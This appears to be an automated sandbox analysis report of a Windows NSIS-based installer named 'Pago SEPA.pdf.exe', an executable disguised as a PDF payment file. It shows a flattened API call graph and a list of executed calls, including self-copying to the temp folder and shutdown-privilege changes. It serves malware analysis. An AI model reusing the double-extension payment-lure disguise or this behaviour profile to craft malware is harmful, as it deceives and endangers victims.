4257->4250 4258->4250 4259->4263 4260 405075 InvalidateRect 4260->4239 4261 40508b 4260->4261 4269 404a03 4261->4269 4262 404f99 SendMessageW 4266 404faf 4262->4266 4263->4262 4263->4266 4265 405023 SendMessageW SendMessageW 4265->4266 4266->4260 4266->4265 4267->4229 4268->4256 4272 40493a 4269->4272 4271 404a18 4271->4239 4273 404953 4272->4273 4274 406041 18 API calls 4273->4274 4275 4049b7 4274->4275 4276 406041 18 API calls 4275->4276 4277 4049c2 4276->4277 4278 406041 18 API calls 4277->4278 4279 4049d8 lstrlenW wsprintfW SetDlgItemTextW 4278->4279 4279->4271 4280 401cfa GetDlgItem GetClientRect 4281 402bbf 18 API calls 4280->4281 4282 401d2c LoadImageW SendMessageW 4281->4282 4283 401d4a DeleteObject 4282->4283 4284 402a4c 4282->4284 4283->4284 3801 40237b 3802 402381 3801->3802 3803 402bbf 18 API calls 3802->3803 3804 402393 3803->3804 3805 402bbf 18 API calls 3804->3805 3806 40239d RegCreateKeyExW 3805->3806 3807 4023c7 3806->3807 3808 402a4c 3806->3808 3809 4023e2 3807->3809 3810 402bbf 18 API calls 3807->3810 3811 4023ee 3809->3811 3818 402ba2 3809->3818 3812 4023d8 lstrlenW 3810->3812 3814 402409 RegSetValueExW 3811->3814 3815 403027 36 API calls 3811->3815 3812->3809 3816 40241f RegCloseKey 3814->3816 3815->3814 3816->3808 3819 406041 18 API calls 3818->3819 3820 402bb6 3819->3820 3820->3811 4285 4027fb 4286 402bbf 18 API calls 4285->4286 4287 402802 FindFirstFileW 4286->4287 4288 40282a 4287->4288 4291 402815 4287->4291 4289 402833 4288->4289 4293 405f66 wsprintfW 4288->4293 4294 40601f lstrcpynW 4289->4294 4293->4289 4294->4291 4295 40457e 4296 4045aa 4295->4296 4297 4045bb 4295->4297 4356 405748 GetDlgItemTextW 4296->4356 4299 4045c7 GetDlgItem 4297->4299 4301 404626 4297->4301 4300 4045db 4299->4300 4305 4045ef SetWindowTextW 4300->4305 4308 405a7e 4 API calls 4300->4308 4302 40470a 4301->4302 4310 406041 18 API calls 4301->4310 4354 4048b9 4301->4354 4302->4354 4358 405748 GetDlgItemTextW 4302->4358 4303 4045b5 4304 4062b3 5 API calls 4303->4304 4304->4297 4309 4040e3 19 API calls 4305->4309 4307 40414a 8 API calls 4312 4048cd 4307->4312 4313 4045e5 4308->4313 4314 40460b 4309->4314 4315 40469a SHBrowseForFolderW 4310->4315 4311 40473a 4316 405adb 18 API calls 4311->4316 4313->4305 4320 4059d3 3 API calls 4313->4320 4317 4040e3 19 API calls 4314->4317 4315->4302 4318 4046b2 CoTaskMemFree 4315->4318 4319 404740 4316->4319 4321 404619 4317->4321 4322 4059d3 3 API calls 4318->4322 4359 40601f lstrcpynW 4319->4359 4320->4305 4357 404118 SendMessageW 4321->4357 4324 4046bf 4322->4324 4327 4046f6 SetDlgItemTextW 4324->4327 4331 406041 18 API calls 4324->4331 4326 40461f 4329 4063f5 5 API calls 4326->4329 4327->4302 4328 404757 4330 4063f5 5 API calls 4328->4330 4329->4301 4337 40475e 4330->4337 4332 4046de lstrcmpiW 4331->4332 4332->4327 4334 4046ef lstrcatW 4332->4334 4333 40479f 4360 40601f lstrcpynW 4333->4360 4334->4327 4336 4047a6 4338 405a7e 4 API calls 4336->4338 4337->4333 4342 405a1f 2 API calls 4337->4342 4343 4047f7 4337->4343 4339 4047ac GetDiskFreeSpaceW 4338->4339 4341 4047d0 MulDiv 4339->4341 4339->4343 4341->4343 4342->4337 4344 404868 4343->4344 4346 404a03 21 API calls 4343->4346 4345 40488b 4344->4345 4347 40140b 2 API calls 4344->4347 4361 404105 KiUserCallbackDispatcher 4345->4361 4348 404855 4346->4348 4347->4345 4350 40486a SetDlgItemTextW 4348->4350 4351 40485a 4348->4351 4350->4344 4352 40493a 21 API calls 4351->4352 4352->4344 4353 4048a7 4353->4354 4362 404513 4353->4362 4354->4307 4356->4303 4357->4326 4358->4311 4359->4328 4360->4336 4361->4353 4363 404521 4362->4363 4364 404526 SendMessageW 4362->4364 4363->4364 4364->4354 4365 4014ff 4366 401507 4365->4366 4368 40151a 4365->4368 4367 402ba2 18 API calls 4366->4367 4367->4368 4369 401000 4370 401037 BeginPaint GetClientRect 4369->4370 4371 40100c DefWindowProcW 4369->4371 4373 4010f3 4370->4373 4374 401179 4371->4374 4375 401073 CreateBrushIndirect FillRect DeleteObject 4373->4375 4376 4010fc 4373->4376 4375->4373 4377 401102 CreateFontIndirectW 4376->4377 4378 401167 EndPaint 4376->4378 4377->4378 4379 401112 6 API calls 4377->4379 4378->4374 4379->4378 4380 404280 4381 4043b2 4380->4381 4383 404298 4380->4383 4382 40441c 4381->4382 4385 4044ee 4381->4385 4389 4043ed GetDlgItem SendMessageW 4381->4389 4384 404426 GetDlgItem 4382->4384 4382->4385 4388 4040e3 19 API calls 4383->4388 4386 404440 4384->4386 4387 4044af 4384->4387 4391 40414a 8 API calls 4385->4391 4386->4387 4393 404466 6 API calls 4386->4393 4387->4385 4394 4044c1 4387->4394 4390 4042ff 4388->4390 4411 404105 KiUserCallbackDispatcher 4389->4411 4396 4040e3 19 API calls 4390->4396 4392 4044e9 4391->4392 4393->4387 4398 4044d7 4394->4398 4399 4044c7 SendMessageW 4394->4399 4397 40430c CheckDlgButton 4396->4397 4409 404105 KiUserCallbackDispatcher 4397->4409 4398->4392 4402 4044dd SendMessageW 4398->4402 4399->4398 4400 404417 4403 404513 SendMessageW 4400->4403 4402->4392 4403->4382 4404 40432a GetDlgItem 4410 404118 SendMessageW 4404->4410 4406 404340 SendMessageW 4407 404366 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4406->4407 4408 40435d GetSysColor 4406->4408 4407->4392 4408->4407 4409->4404 4410->4406 4411->4400 4419 401904 4420 40193b 4419->4420 4421 402bbf 18 API calls 4420->4421 4422 401940 4421->4422 4423 405810 69 API calls 4422->4423 4424 401949 4423->4424 4425 402d04 4426 402d16 SetTimer 4425->4426 4427 402d2f 4425->4427 4426->4427 4428 402d84 4427->4428 4429 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4427->4429 4429->4428 4430 402786 4431 4029f7 4430->4431 4432 40278d 4430->4432 4433 402ba2 18 API calls 4432->4433 4434 402798 4433->4434 4435 40279f SetFilePointer 4434->4435 4435->4431 4436 4027af 4435->4436 4438 405f66 wsprintfW 4436->4438 4438->4431 4439 401907 4440 402bbf 18 API calls 4439->4440 4441 40190e 4440->4441 4442 405764 MessageBoxIndirectW 4441->4442 4443 401917 4442->4443 4444 401e08 4445 402bbf 18 API calls 4444->4445 4446 401e0e 4445->4446 4447 402bbf 18 API calls 4446->4447 4448 401e17 4447->4448 4449 402bbf 18 API calls 4448->4449 4450 401e20 4449->4450 4451 402bbf 18 API calls 4450->4451 4452 401e29 4451->4452 4453 401423 25 API calls 4452->4453 4454 401e30 ShellExecuteW 4453->4454 4455 401e61 4454->4455 3593 403c0b 3594 403c23 3593->3594 3595 403d5e 3593->3595 3594->3595 3596 403c2f 3594->3596 3597 403daf 3595->3597 3598 403d6f GetDlgItem GetDlgItem 3595->3598 3599 403c3a SetWindowPos 3596->3599 3600 403c4d 3596->3600 3602 403e09 3597->3602 3610 401389 2 API calls 3597->3610 3601 4040e3 19 API calls 3598->3601 3599->3600 3604 403c52 ShowWindow 3600->3604 3605 403c6a 3600->3605 3606 403d99 SetClassLongW 3601->3606 3603 40412f SendMessageW 3602->3603 3623 403d59 3602->3623 3632 403e1b 3603->3632 3604->3605 3607 403c72 DestroyWindow 3605->3607 3608 403c8c 3605->3608 3609 40140b 2 API calls 3606->3609 3662 40406c 3607->3662 3612 403c91 SetWindowLongW 3608->3612 3613 403ca2 3608->3613 3609->3597 3611 403de1 3610->3611 3611->3602 3614 403de5 SendMessageW 3611->3614 3612->3623 3617 403d4b 3613->3617 3618 403cae GetDlgItem 3613->3618 3614->3623 3615 40140b 2 API calls 3615->3632 3616 40406e DestroyWindow KiUserCallbackDispatcher 3616->3662 3672 40414a 3617->3672 3621 403cc1 SendMessageW IsWindowEnabled 3618->3621 3622 403cde 3618->3622 3620 40409d ShowWindow 3620->3623 3621->3622 3621->3623 3625 403ceb 3622->3625 3626 403d32 SendMessageW 3622->3626 3627 403cfe 3622->3627 3637 403ce3 3622->3637 3624 406041 18 API calls 3624->3632 3625->3626 3625->3637 3626->3617 3629 403d06 3627->3629 3630 403d1b 3627->3630 3633 40140b 2 API calls 3629->3633 3634 40140b 2 API calls 3630->3634 3631 403d19 3631->3617 3632->3615 3632->3616 3632->3623 3632->3624 3635 4040e3 19 API calls 3632->3635 3653 403fae DestroyWindow 3632->3653 3663 4040e3 3632->3663 3633->3637 3636 403d22 3634->3636 3635->3632 3636->3617 3636->3637 3669 4040bc 3637->3669 3639 403e96 GetDlgItem 3640 403eb3 ShowWindow KiUserCallbackDispatcher 3639->3640 3641 403eab 3639->3641 3666 404105 KiUserCallbackDispatcher 3640->3666 3641->3640 3643 403edd EnableWindow 3647 403ef1 3643->3647 3644 403ef6 GetSystemMenu EnableMenuItem SendMessageW 3645 403f26 SendMessageW 3644->3645 3644->3647 3645->3647 3647->3644 3667 404118 SendMessageW 3647->3667 3668 40601f lstrcpynW 3647->3668 3649 403f54 lstrlenW 3650 406041 18 API calls 3649->3650 3651 403f6a SetWindowTextW 3650->3651 3652 401389 2 API calls 3651->3652 3652->3632 3654 403fc8 CreateDialogParamW 3653->3654 3653->3662 3655 403ffb 3654->3655 3654->3662 3656 4040e3 19 API calls 3655->3656 3657 404006 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3656->3657 3658 401389 2 API calls 3657->3658 3659 40404c 3658->3659 3659->3623 3660 404054 ShowWindow 3659->3660 3661 40412f SendMessageW 3660->3661 3661->3662 3662->3620 3662->3623 3664 406041 18 API calls 3663->3664 3665 4040ee SetDlgItemTextW 3664->3665 3665->3639 3666->3643 3667->3647 3668->3649 3670 4040c3 3669->3670 3671 4040c9 SendMessageW 3669->3671 3670->3671 3671->3631 3673 404162 GetWindowLongW 3672->3673 3683 4041eb 3672->3683 3674 404173 3673->3674 3673->3683 3675 404182 GetSysColor 3674->3675 3676 404185 3674->3676 3675->3676 3677 404195 SetBkMode 3676->3677 3678 40418b SetTextColor 3676->3678 3679 4041b3 3677->3679 3680 4041ad GetSysColor 3677->3680 3678->3677 3681 4041c4 3679->3681 3682 4041ba SetBkColor 3679->3682 3680->3679 3681->3683 3684 4041d7 DeleteObject 3681->3684 3685 4041de CreateBrushIndirect 3681->3685 3682->3681 3683->3623 3684->3685 3685->3683 3686 40378e 3687 4037a6 3686->3687 3688 403798 CloseHandle 3686->3688 3693 4037d3 3687->3693 3688->3687 3694 4037e1 3693->3694 3695 4037e6 FreeLibrary GlobalFree 3694->3695 3696 4037ab 3694->3696 3695->3695 3695->3696 3697 405810 3696->3697 3698 405adb 18 API calls 3697->3698 3699 405830 3698->3699 3700 405838 DeleteFileW 3699->3700 3701 40584f 3699->3701 3730 4037b7 3700->3730 3706 40596f 3701->3706 3733 40601f lstrcpynW 3701->3733 3703 405875 3704 405888 3703->3704 3705 40587b lstrcatW 3703->3705 3709 405a1f 2 API calls 3704->3709 3708 40588e 3705->3708 3707 406362 2 API calls 3706->3707 3706->3730 3710 405994 3707->3710 3711 40589e lstrcatW 3708->3711 3712 4058a9 lstrlenW FindFirstFileW 3708->3712 3709->3708 3713 4059d3 3 API calls 3710->3713 3710->3730 3711->3712 3712->3706 3731 4058cb 3712->3731 3714 40599e 3713->3714 3716 4057c8 5 API calls 3714->3716 3715 405952 FindNextFileW 3719 405968 FindClose 3715->3719 3715->3731 3718 4059aa 3716->3718 3720 4059c4 3718->3720 3721 4059ae 3718->3721 3719->3706 3723 40517e 25 API calls 3720->3723 3724 40517e 25 API calls 3721->3724 3721->3730 3723->3730 3726 4059bb 3724->3726 3725 405810 62 API calls 3725->3731 3728 405ec0 38 API calls 3726->3728 3727 40517e 25 API calls 3727->3715 3728->3730 3729 40517e 25 API calls 3729->3731 3731->3715 3731->3725 3731->3727 3731->3729 3732 405ec0 38 API calls 3731->3732 3734 40601f lstrcpynW 3731->3734 3735 4057c8 3731->3735 3732->3731 3733->3703 3734->3731 3736 405bcf 2 API calls 3735->3736 3737 4057d4 3736->3737 3738 4057f5 3737->3738 3739 4057e3 RemoveDirectoryW 3737->3739 3740 4057eb DeleteFileW 3737->3740 3738->3731 3741 4057f1 3739->3741 3740->3741 3741->3738 3742 405801 SetFileAttributesW 3741->3742 3742->3738 4461 401491 4462 40517e 25 API calls 4461->4462 4463 401498 4462->4463 4464 401a15 4465 402bbf 18 API calls 4464->4465 4466 401a1e ExpandEnvironmentStringsW 4465->4466 4467 401a32 4466->4467 4468 401a45 4466->4468 4467->4468 4469 401a37 lstrcmpW 4467->4469 4469->4468 4470 402515 4471 402bbf 18 API calls 4470->4471 4472 40251c 4471->4472 4475 405bf4 GetFileAttributesW CreateFileW 4472->4475 4474 402528 4475->4474 4476 402095 4477 402bbf 18 API calls 4476->4477 4478 40209c 4477->4478 4479 402bbf 18 API calls 4478->4479 4480 4020a6 4479->4480 4481 402bbf 18 API calls 4480->4481 4482 4020b0 4481->4482 4483 402bbf 18 API calls 4482->4483 4484 4020ba 4483->4484 4485 402bbf 18 API calls 4484->4485 4487 4020c4 4485->4487 4486 402103 CoCreateInstance 4491 402122 4486->4491 4487->4486 4488 402bbf 18 API calls 4487->4488 4488->4486 4489 401423 25 API calls 4490 4021e1 4489->4490 4491->4489 4491->4490 4492 401b16 4493 402bbf 18 API calls 4492->4493 4494 401b1d 4493->4494 4495 402ba2 18 API calls 4494->4495 4496 401b26 wsprintfW 4495->4496 4497 402a4c 4496->4497 4498 406b18 4499 406567 4498->4499 4499->4499 4500 4065f1 GlobalAlloc 4499->4500 4501 4065e8 GlobalFree 4499->4501 4502 406ed2 4499->4502 4503 406668 GlobalAlloc 4499->4503 4504 40665f GlobalFree 4499->4504 4500->4499 4500->4502 4501->4500 4503->4499 4503->4502 4504->4503 3821 40159b 3822 402bbf 18 API calls 3821->3822 3823 4015a2 SetFileAttributesW 3822->3823 3824 4015b4 3823->3824 3825 401f1d 3826 402bbf 18 API calls 3825->3826 3827 401f24 3826->3827 3828 4063f5 5 API calls 3827->3828 3829 401f33 GetFileVersionInfoSizeW 3828->3829 3830 401f4f GlobalAlloc 3829->3830 3832 402a4c 3829->3832 3831 401f63 3830->3831 3830->3832 3833 4063f5 5 API calls 3831->3833 3834 401f6a 3833->3834 3835 4063f5 5 API calls 3834->3835 3837 401f74 3835->3837 3836 401fb7 3836->3832 3837->3836 3841 405f66 wsprintfW 3837->3841 3839 401fa9 3842 405f66 wsprintfW 3839->3842 3841->3839 3842->3836 4512 40229d 4513 4022a5 4512->4513 4514 4022ab 4512->4514 4515 402bbf 18 API calls 4513->4515 4516 402bbf 18 API calls 4514->4516 4517 4022b9 4514->4517 4515->4514 4516->4517 4518 4022c7 4517->4518 4519 402bbf 18 API calls 4517->4519 4520 402bbf 18 API calls 4518->4520 4519->4518 4521 4022d0 WritePrivateProfileStringW 4520->4521 4522 40149e 4523 402288 4522->4523 4524 4014ac PostQuitMessage 4522->4524 4524->4523 4525 40249e 4526 402cc9 19 API calls 4525->4526 4527 4024a8 4526->4527 4528 402ba2 18 API calls 4527->4528 4529 4024b1 4528->4529 4530 4024d5 RegEnumValueW 4529->4530 4531 4024c9 RegEnumKeyW 4529->4531 4533 40281e 4529->4533 4532 4024ee RegCloseKey 4530->4532 4530->4533 4531->4532 4532->4533 4535 40231f 4536 402324 4535->4536 4537 40234f 4535->4537 4538 402cc9 19 API calls 4536->4538 4539 402bbf 18 API calls 4537->4539 4540 40232b 4538->4540 4542 402356 4539->4542 4541 402bbf 18 API calls 4540->4541 4545 40236c 4540->4545 4543 40233c RegDeleteValueW RegCloseKey 4541->4543 4546 402bff RegOpenKeyExW 4542->4546 4543->4545 4550 402c2a 4546->4550 4555 402c76 4546->4555 4547 402c50 RegEnumKeyW 4548 402c62 RegCloseKey 4547->4548 4547->4550 4551 4063f5 5 API calls 4548->4551 4549 402c87 RegCloseKey 4549->4555 4550->4547 4550->4548 4550->4549 4552 402bff 5 API calls 4550->4552 4553 402c72 4551->4553 4552->4550 4554 402ca2 RegDeleteKeyW 4553->4554 4553->4555 4554->4555 4555->4545 4563 401ca3 4564 402ba2 18 API calls 4563->4564 4565 401ca9 IsWindow 4564->4565 4566 401a05 4565->4566 4567 403826 4568 403831 4567->4568 4569 403835 4568->4569 4570 403838 GlobalAlloc 4568->4570 4570->4569 4571 402a27 SendMessageW 4572 402a41 InvalidateRect 4571->4572 4573 402a4c 4571->4573 4572->4573 3577 40242a 3588 402cc9 3577->3588 3579 402434 3580 402bbf 18 API calls 3579->3580 3581 40243d 3580->3581 3582 402448 RegQueryValueExW 3581->3582 3585 40281e 3581->3585 3583 40246e RegCloseKey 3582->3583 3584 402468 3582->3584 3583->3585 3584->3583 3592 405f66 wsprintfW 3584->3592 3589 402bbf 18 API calls 3588->3589 3590 402ce2 3589->3590 3591 402cf0 RegOpenKeyExW 3590->3591 3591->3579 3592->3583 4574 40172d 4575 402bbf 18 API calls 4574->4575 4576 401734 SearchPathW 4575->4576 4577 40174f 4576->4577 4585 404231 lstrlenW 4586 404250 4585->4586 4587 404252 WideCharToMultiByte 4585->4587 4586->4587 4588 4027b4 4589 4027ba 4588->4589 4590 4027c2 FindClose 4589->4590 4591 402a4c 4589->4591 4590->4591 3749 401b37 3750 401b44 3749->3750 3751 401b88 3749->3751 3754 401bcd 3750->3754 3759 401b5b 3750->3759 3752 401bb2 GlobalAlloc 3751->3752 3753 401b8d 3751->3753 3755 406041 18 API calls 3752->3755 3762 402288 3753->3762 3770 40601f lstrcpynW 3753->3770 3756 406041 18 API calls 3754->3756 3754->3762 3755->3754 3757 402282 3756->3757 3764 405764 MessageBoxIndirectW 3757->3764 3768 40601f lstrcpynW 3759->3768 3760 401b9f GlobalFree 3760->3762 3763 401b6a 3769 40601f lstrcpynW 3763->3769 3764->3762 3766 401b79 3771 40601f lstrcpynW 3766->3771 3768->3763 3769->3766 3770->3760 3771->3762 4592 404537 4593 404547 4592->4593 4594 40456d 4592->4594 4595 4040e3 19 API calls 4593->4595 4596 40414a 8 API calls 4594->4596 4597 404554 SetDlgItemTextW 4595->4597 4598 404579 4596->4598 4597->4594 4599 402537 4600 402562 4599->4600 4601 40254b 4599->4601 4603 402596 4600->4603 4604 402567 4600->4604 4602 402ba2 18 API calls 4601->4602 4610 402552 4602->4610 4605 402bbf 18 API calls 4603->4605 4606 402bbf 18 API calls 4604->4606 4607 40259d lstrlenW 4605->4607 4608 40256e WideCharToMultiByte lstrlenA 4606->4608 4607->4610 4608->4610 4609 4025e0 4610->4609 4612 405cd5 5 API calls 4610->4612 4613 4025ca 4610->4613 4611 405ca6 WriteFile 4611->4609 4612->4613 4613->4609 4613->4611 4614 4014b8 4615 4014be 4614->4615 4616 401389 2 API calls 4615->4616 4617 4014c6 4616->4617 3778 4015b9 3779 402bbf 18 API calls 3778->3779 3780 4015c0 3779->3780 3781 405a7e 4 API calls 3780->3781 3793 4015c9 3781->3793 3782 401629 3784 40165b 3782->3784 3785 40162e 3782->3785 3783 405a00 CharNextW 3783->3793 3787 401423 25 API calls 3784->3787 3797 401423 3785->3797 3794 401653 3787->3794 3790 4056ca 2 API calls 3790->3793 3791 4056e7 5 API calls 3791->3793 3792 401642 SetCurrentDirectoryW 3792->3794 3793->3782 3793->3783 3793->3790 3793->3791 3795 40160f GetFileAttributesW 3793->3795 3796 40564d 4 API calls 3793->3796 3795->3793 3796->3793 3798 40517e 25 API calls 3797->3798 3799 401431 3798->3799 3800 40601f lstrcpynW 3799->3800 3800->3792 4618 40293b 4619 402ba2 18 API calls 4618->4619 4620 402941 4619->4620 4621 402964 4620->4621 4622 40297d 4620->4622 4627 40281e 4620->4627 4623 402969 4621->4623 4624 40297a 4621->4624 4625 402993 4622->4625 4626 402987 4622->4626 4632 40601f lstrcpynW 4623->4632 4633 405f66 wsprintfW 4624->4633 4629 406041 18 API calls 4625->4629 4628 402ba2 18 API calls 4626->4628 4628->4627 4629->4627 4632->4627 4633->4627 3843 4052bd 3844 405467 3843->3844 3845 4052de GetDlgItem GetDlgItem GetDlgItem 3843->3845 3846 405470 GetDlgItem CreateThread CloseHandle 3844->3846 3847 405498 3844->3847 3888 404118 SendMessageW 3845->3888 3846->3847 3891 405251 5 API calls 3846->3891 3849 4054c3 3847->3849 3851 4054e8 3847->3851 3852 4054af ShowWindow ShowWindow 3847->3852 3853 405523 3849->3853 3856 4054d7 3849->3856 3857 4054fd ShowWindow 3849->3857 3850 40534e 3854 405355 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3850->3854 3858 40414a 8 API calls 3851->3858 3890 404118 SendMessageW 3852->3890 3853->3851 3861 405531 SendMessageW 3853->3861 3859 4053c3 3854->3859 3860 4053a7 SendMessageW SendMessageW 3854->3860 3862 4040bc SendMessageW 3856->3862 3864 40551d 3857->3864 3865 40550f 3857->3865 3863 4054f6 3858->3863 3867 4053d6 3859->3867 3868 4053c8 SendMessageW 3859->3868 3860->3859 3861->3863 3869 40554a CreatePopupMenu 3861->3869 3862->3851 3866 4040bc SendMessageW 3864->3866 3870 40517e 25 API calls 3865->3870 3866->3853 3872 4040e3 19 API calls 3867->3872 3868->3867 3871 406041 18 API calls 3869->3871 3870->3864 3873 40555a AppendMenuW 3871->3873 3874 4053e6 3872->3874 3875 405577 GetWindowRect 3873->3875 3876 40558a TrackPopupMenu 3873->3876 3877 405423 GetDlgItem SendMessageW 3874->3877 3878 4053ef ShowWindow 3874->3878 3875->3876 3876->3863 3879 4055a5 3876->3879 3877->3863 3882 40544a SendMessageW SendMessageW 3877->3882 3880 405412 3878->3880 3881 405405 ShowWindow 3878->3881 3883 4055c1 SendMessageW 3879->3883 3889 404118 SendMessageW 3880->3889 3881->3880 3882->3863 3883->3883 3884 4055de OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3883->3884 3886 405603 SendMessageW 3884->3886 3886->3886 3887 40562c GlobalUnlock SetClipboardData CloseClipboard 3886->3887 3887->3863 3888->3850 3889->3877 3890->3849

                                                                      Executed Functions

                                                                      Function 0040326A Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 401stringfilecomCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 40326a-40329c SetErrorMode GetVersion 1 40329e-4032a6 call 4063f5 0->1 2 4032af-403342 call 406389 * 3 call 4063f5 * 2 #17 OleInitialize SHGetFileInfoW call 40601f GetCommandLineW call 40601f GetModuleHandleW 0->2 1->2 7 4032a8 1->7 20 403344-40334b 2->20 21 40334c-403366 call 405a00 CharNextW 2->21 7->2 20->21 24 40336c-403372 21->24 25 40347e-403498 GetTempPathW call 403239 21->25 27 403374-403379 24->27 28 40337b-403381 24->28 32 4034f0-40350a DeleteFileW call 402dee 25->32 33 40349a-4034b8 GetWindowsDirectoryW lstrcatW call 403239 25->33 27->27 27->28 30 403383-403387 28->30 31 403388-40338c 28->31 30->31 34 403392-403398 31->34 35 40344a-403457 call 405a00 31->35 53 403510-403516 32->53 54 4035bb-4035cc ExitProcess CoUninitialize 32->54 33->32 50 4034ba-4034ea GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 33->50 39 4033b2-4033eb 34->39 40 40339a-4033a1 34->40 51 403459-40345a 35->51 52 40345b-403461 35->52 41 403408-403442 39->41 42 4033ed-4033f2 39->42 46 4033a3-4033a6 40->46 47 4033a8 40->47 41->35 49 403444-403448 41->49 42->41 48 4033f4-4033fc 42->48 46->39 46->47 47->39 57 403403 48->57 58 4033fe-403401 48->58 49->35 59 403469-403477 call 40601f 49->59 50->32 50->54 51->52 52->24 61 403467 52->61 62 4035ab-4035b2 call 403868 53->62 63 40351c-403527 call 405a00 53->63 55 4036f2-4036f8 54->55 56 4035d2-4035e2 call 405764 ExitProcess 54->56 65 403776-40377e 55->65 66 4036fa-403710 GetCurrentProcess OpenProcessToken 55->66 57->41 58->41 58->57 68 40347c 59->68 61->68 72 4035b7 62->72 79 403575-40357f 63->79 80 403529-40355e 63->80 73 403780 65->73 74 403784-403788 ExitProcess 65->74 76 403712-403740 LookupPrivilegeValueW AdjustTokenPrivileges 66->76 77 403746-403754 call 4063f5 66->77 68->25 72->54 73->74 76->77 90 403762-40376d ExitWindowsEx 77->90 91 403756-403760 77->91 83 403581-40358f call 405adb 79->83 84 4035e8-4035fc call 4056e7 lstrcatW 79->84 82 403560-403564 80->82 86 403566-40356b 82->86 87 40356d-403571 82->87 83->54 99 403591-4035a7 call 40601f * 2 83->99 97 403609-403623 lstrcatW lstrcmpiW 84->97 98 4035fe-403604 lstrcatW 84->98 86->87 93 403573 86->93 87->82 87->93 90->65 92 40376f-403771 call 40140b 90->92 91->90 91->92 92->65 93->79 97->54 101 403625-403628 97->101 98->97 99->62 103 403631 call 4056ca 101->103 104 40362a-40362f call 40564d 101->104 109 403636-403644 SetCurrentDirectoryW 103->109 104->109 112 403651-40367a call 40601f 109->112 113 403646-40364c call 40601f 109->113 117 40367f-40369b call 406041 DeleteFileW 112->117 113->112 120 4036dc-4036e4 117->120 121 40369d-4036ad CopyFileW 117->121 120->117 122 4036e6-4036ed call 405ec0 120->122 121->120 123 4036af-4036cf call 405ec0 call 406041 call 4056ff 121->123 122->54 123->120 132 4036d1-4036d8 CloseHandle 123->132 132->120
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 0040328C
                                                                      • GetVersion.KERNEL32 ref: 00403292
                                                                      • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032E2
                                                                      • OleInitialize.OLE32(00000000), ref: 004032E9
                                                                      • SHGetFileInfoW.SHELL32(004206C8,00000000,?,000002B4,00000000), ref: 00403305
                                                                      • GetCommandLineW.KERNEL32(00428220,NSIS Error), ref: 0040331A
                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000), ref: 0040332D
                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000020), ref: 00403354
                                                                        • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                        • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422
                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348F
                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034A0
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034AC
                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034C0
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C8
                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D9
                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034E1
                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004034F5
                                                                        • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                      • ExitProcess.KERNEL32(?), ref: 004035BB
                                                                      • CoUninitialize.COMBASE(?), ref: 004035C0
                                                                      • ExitProcess.KERNEL32 ref: 004035E2
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000,?), ref: 004035F5
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000,?), ref: 00403604
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000,?), ref: 0040360F
                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000,?), ref: 0040361B
                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403637
                                                                      • DeleteFileW.KERNEL32(0041FEC8,0041FEC8,?,0042A000,?), ref: 00403691
                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Pago SEPA.pdf.exe,0041FEC8,00000001), ref: 004036A5
                                                                      • CloseHandle.KERNEL32(00000000,0041FEC8,0041FEC8,?,0041FEC8,00000000), ref: 004036D2
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403701
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403708
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040371D
                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403740
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403765
                                                                      • ExitProcess.KERNEL32 ref: 00403788
                                                                      Strings
                                                                      Memory Dump Source
